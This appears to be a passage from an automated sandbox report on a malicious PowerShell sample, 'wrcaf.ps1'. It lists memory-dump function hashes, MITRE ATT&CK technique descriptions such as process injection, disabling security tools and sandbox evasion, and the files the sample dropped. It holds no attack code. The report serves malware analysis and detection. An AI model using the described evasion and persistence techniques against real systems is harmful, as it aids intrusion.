Instruction Fuzzy Hash: F921EB307102114FCF04AB79A55416D77AB9FC4945710852ADD0AC7788EF75DC0B47D6

Function 06995B50 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed7535d8125fced65d797eb0c2da08487639f92963d4e22b1178c6a143bc5ae6
Instruction ID: 16e5e0f7b7a2d4819a0dede1f771fdfa7cf7ab682d7c1ffaab97de1413495c21
Opcode Fuzzy Hash: ed7535d8125fced65d797eb0c2da08487639f92963d4e22b1178c6a143bc5ae6
Instruction Fuzzy Hash: 86110321744248AFCB46EBBC891085F7FEB9F8220470584A9D6068B352DE35DE46C7E1

Function 02AED2CC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4117869151.0000000002AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2aed000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b72fa387a6033008a3d41959785b1bd107e66f76892fc90567e7c52e771d870
Instruction ID: df08f162ad7a3885a0bf60667277bc983aefca15acdb70d0b6cfc8553098f3c1
Opcode Fuzzy Hash: 4b72fa387a6033008a3d41959785b1bd107e66f76892fc90567e7c52e771d870
Instruction Fuzzy Hash: 4F2138B1504645DFDF01DF14D9C4B2AFFA9FB84324F24C9A9D84A4B246CB3AD447CAA1

Function 02AED0FC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4117869151.0000000002AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2aed000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e731a8a0b6eabfebf6a99e91e6cec13742f7636d224ca2077a4a83d2a165f0b
Instruction ID: 118edd2509c237d9424c6c4ae9a86586d46dffe934bbfe006ae0c9e71760f905
Opcode Fuzzy Hash: 8e731a8a0b6eabfebf6a99e91e6cec13742f7636d224ca2077a4a83d2a165f0b
Instruction Fuzzy Hash: 75213471500600EFDF05DF14C9C0B26BBA9FB88314F20C56DD80A4B256CB3AD44BCA61

Function 02AED47C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4117869151.0000000002AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2aed000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78b22c4d9d7a0fa6964807c10392c5bbb0e36a8b8654a421b07f16a1b1b2d75b
Instruction ID: aa5031db8fbecdf04cec99adcc19ca9a974752e893078143cbe7caf9e973551b
Opcode Fuzzy Hash: 78b22c4d9d7a0fa6964807c10392c5bbb0e36a8b8654a421b07f16a1b1b2d75b
Instruction Fuzzy Hash: 66210475544600DFDF04DF14D9C0B26BBA9FB84718F24C5ADE80A4B256CB36D447CA71

Function 069961A0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f75955522e9a9872f3427d4979e994d285e2965e26cbd4bbb151f9d7afea514a
Instruction ID: de6d08c46526117244775b1036dbf2f054cca20995ce66ed5f84aa4fd94fe590
Opcode Fuzzy Hash: f75955522e9a9872f3427d4979e994d285e2965e26cbd4bbb151f9d7afea514a
Instruction Fuzzy Hash: 0C21AC74A001159FCB54DF98CA80A9EFB72FF80314B5685A5D855ABA92C730FD02CBE0

Function 06995B08 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26e417327c291190aa8b4df995a85164035577539bfce3fc625d4c6ab18e3fae
Instruction ID: 422b20571bd49135d24d0ce39ef9f1b08e3c4e87e9b2e7a3a8bada116c77aefe
Opcode Fuzzy Hash: 26e417327c291190aa8b4df995a85164035577539bfce3fc625d4c6ab18e3fae
Instruction Fuzzy Hash: 8901AD2214A3A05FC243A72C8D208D77FAA9F8351470A40E3E1448F667CA258E98C3F5

Function 06996A39 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46f202d1e4687886a8c12b0b46fd51fe788c1e28aee91c52071dc15d7c0775a1
Instruction ID: 5b99b99b6cfcb240b7c111877035cdadaabd2444674f0ed6ce3c7045d705e777
Opcode Fuzzy Hash: 46f202d1e4687886a8c12b0b46fd51fe788c1e28aee91c52071dc15d7c0775a1
Instruction Fuzzy Hash: 2C11C4703003515FCF02FB38E954A4DBB669F81204B14876AC401DF796DF75A94B8BE6

Function 069934F0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9123540da846c7310cb5134e4c333b113caaf9e9cc6ab8b925a40277a33abc6
Instruction ID: 9d242e3cc01831f7a5751589735d6900539e174732e3561c5d29ee66b636a9aa
Opcode Fuzzy Hash: f9123540da846c7310cb5134e4c333b113caaf9e9cc6ab8b925a40277a33abc6
Instruction Fuzzy Hash: B311FA7A3001149FCF04DF59E994C5A7BAAEF8C725B14815AFA058B365CB32DC11DBA0

Function 02AED2C7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4117869151.0000000002AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2aed000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff13d54f3b91835ad91617696d418c13a4717a8e78c88f658639b396ea067ac
Instruction ID: 4be07fdf686035524e448404d693d886ffe37ceeb324b3d950cc4617b5f4119f
Opcode Fuzzy Hash: dff13d54f3b91835ad91617696d418c13a4717a8e78c88f658639b396ea067ac
Instruction Fuzzy Hash: BF118F76504684DFDB12CF14D5C4B1AFFA1FB84324F28C6AAD8494B656C33AD44ACBA2

Function 02AED0F7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4117869151.0000000002AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2aed000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
Instruction ID: 946b3d575b247c2bab213e958ae2f7fd75c35b50ab0787b14643ae91f6966b89
Opcode Fuzzy Hash: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
Instruction Fuzzy Hash: 1511DD75504680CFDB06CF10D9C4B15BFA1FB88318F28C6AADC0A4B656C33AD44ACB61

Function 02AED477 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4117869151.0000000002AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2aed000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
Instruction ID: 5a63f31b2b10dbe539760bcaa6dc4209f29a2b1ff3c6c8400b7d2b73b11569a6
Opcode Fuzzy Hash: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
Instruction Fuzzy Hash: E111B875504680CFDB02CF14D9C4B15BFA1FB84318F28CAAAD84A4B656C33AD44ACBA2

Function 06996A48 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f5687c701a5c4f24c3bb59934656f8005861e596ddeac1bfa461fd5f4eb02ee
Instruction ID: 77908deb407a8cf3e0c0750ac0ad703b22b439c3180276a9d60e63fc824cd40d
Opcode Fuzzy Hash: 1f5687c701a5c4f24c3bb59934656f8005861e596ddeac1bfa461fd5f4eb02ee
Instruction Fuzzy Hash: 0211A0703003515FCF01FB38E544A4DBBA6AF81200B54876AC4018B399DF71A94B8BDA

Function 06994799 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bafbc8fa50db1c1907c4d5b67d59b6082937da54afe8cb9971417370122f7ae3
Instruction ID: c5df35adba4a26a8cf1b4b8b23576fc47828454f8f45bfdae4ce10396525ee6a
Opcode Fuzzy Hash: bafbc8fa50db1c1907c4d5b67d59b6082937da54afe8cb9971417370122f7ae3
Instruction Fuzzy Hash: 1C012C71705114AF8701DE59DD84C9F7FAAEF892647054156F609C7262CA319A118BA0

Function 06994CA0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f6051653b38bd060948afc133673f98ee6fdcbabc7664811b9336c2ae8edb3e
Instruction ID: be256922b9e3875eae6bb5d7a292b722fb1827bad6f810977ebdc5f87a30582b
Opcode Fuzzy Hash: 2f6051653b38bd060948afc133673f98ee6fdcbabc7664811b9336c2ae8edb3e
Instruction Fuzzy Hash: 59F046311002605FC3128A158D40DABFFAEFF80311B08851AEA8187542CA30A942C7B0

Function 06992DF7 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b850eb847f7e22fad1207fe89514ed9931079a8e2f9cb627329ab5ef0b450da3
Instruction ID: 882750c53e8786f95d38bfe4d54745295a493992f10c01dcc7a5865f2437549e
Opcode Fuzzy Hash: b850eb847f7e22fad1207fe89514ed9931079a8e2f9cb627329ab5ef0b450da3
Instruction Fuzzy Hash: E001483080070AEFCB50CFA9D9416DAFBF1FF08214B10892DC959A7710D731AA42CFA0

Function 0699698E Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57a19bf5de374b7f479224c8b03d4a042cf5c1a9bb26f38394f5b378888dd72c
Instruction ID: 12c2b80fb4a85cbde2f4ded547dc85ad0d243f45f7cb2454adbc814039831c79
Opcode Fuzzy Hash: 57a19bf5de374b7f479224c8b03d4a042cf5c1a9bb26f38394f5b378888dd72c
Instruction Fuzzy Hash: 3D01D476A442058FEB60DB29D854F557BB0FF49310F140155E411CB7B6CB35E951CB60

Function 069947A8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 474a0c47fc45b9242d249a76be7560f7e5c04dcf5405e427d98dce15102b8787
Instruction ID: e8689836e4d9dbeffe31c4b59e7026ee3bb4836df7da5b3df63b27bed89349c4
Opcode Fuzzy Hash: 474a0c47fc45b9242d249a76be7560f7e5c04dcf5405e427d98dce15102b8787
Instruction Fuzzy Hash: 22F0F976700118AF8B44DF99D884CAFBBAEFF8C260710812AF509C7311CA31A9018BA0

Function 0699842E Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13059df8da345a31c411abd6d2ce3328cc88a3bd012a8e017d73da3468550320
Instruction ID: 86ce2f851753fb94bc4cc1a51edc2f0e19311f5724621f8bd4f4843e875e5e83
Opcode Fuzzy Hash: 13059df8da345a31c411abd6d2ce3328cc88a3bd012a8e017d73da3468550320
Instruction Fuzzy Hash: 2AF0BB32E011589BDF14CA99DC11ADEBBBAEF89210F04412AE904A7750DB715906CBE1

Function 06994CB0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dafdd2fb345420576ec017b6af3bf70956c35a6ad8d07e60b8d7e22f964df96c
Instruction ID: e9fe6f6410a3fa837b970b8c78285c179325099b524a4c5d3810603eaf07d82e
Opcode Fuzzy Hash: dafdd2fb345420576ec017b6af3bf70956c35a6ad8d07e60b8d7e22f964df96c
Instruction Fuzzy Hash: C5F0A7715006246FD720465ADC80DB7FBEEFBC4721B108529FA8643A00CA75A855C7B0

Function 06992E08 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 877d8aefb1108450db2193ee670d39cd8d793e2b7812d33ce8b94e5782b1f288
Instruction ID: ae45cfe60c628b11ecf4da9c5c85c42cc21b029c9a3a00298e5d4f3427cdec33
Opcode Fuzzy Hash: 877d8aefb1108450db2193ee670d39cd8d793e2b7812d33ce8b94e5782b1f288
Instruction Fuzzy Hash: 1DF01430D0120ADFCB54DFAAD8816AABBF1FF48314B209829C519A7720D731AA42CF90

Function 069945D8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 894b80e7f64858e125dd833939507d341c7108e4c3cc361ec16ac105d185d5a6
Instruction ID: 1cbeb624810cc4bf013fc04c8016eb720e3639152769699ef0a02d6dc161b10a
Opcode Fuzzy Hash: 894b80e7f64858e125dd833939507d341c7108e4c3cc361ec16ac105d185d5a6
Instruction Fuzzy Hash: D0E0D81130A39027C7916A6D6C5055BBF8B9FCA560B9500BEF249CB742CD624D0587F6

Function 069945E8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bfdb1cad783c88bc0ae1f83272ddde4f9e6c67fe40621971751481a25e45047
Instruction ID: bc0a8780c02c7f83337079796932d90d9c49090e50c63b8bc97903430a7be509
Opcode Fuzzy Hash: 9bfdb1cad783c88bc0ae1f83272ddde4f9e6c67fe40621971751481a25e45047
Instruction Fuzzy Hash: 83D05E62705624238A94A69EB88456FAACFDBC9A71B90403EE31EC7740CD729C0647E9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wrcaf.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Package.exe_55a92a429a98c25290d2b6d865f190a11d46a9_8a8df546_ee914679-35a3-4a17-9412-1ed27b8342d9\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A3F.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D3E.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DCB.tmp.xml

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RES3794.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fcc4yn4a.w3m.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gn3u3icz.d14.psm1

Windows Analysis Report
wrcaf.ps1

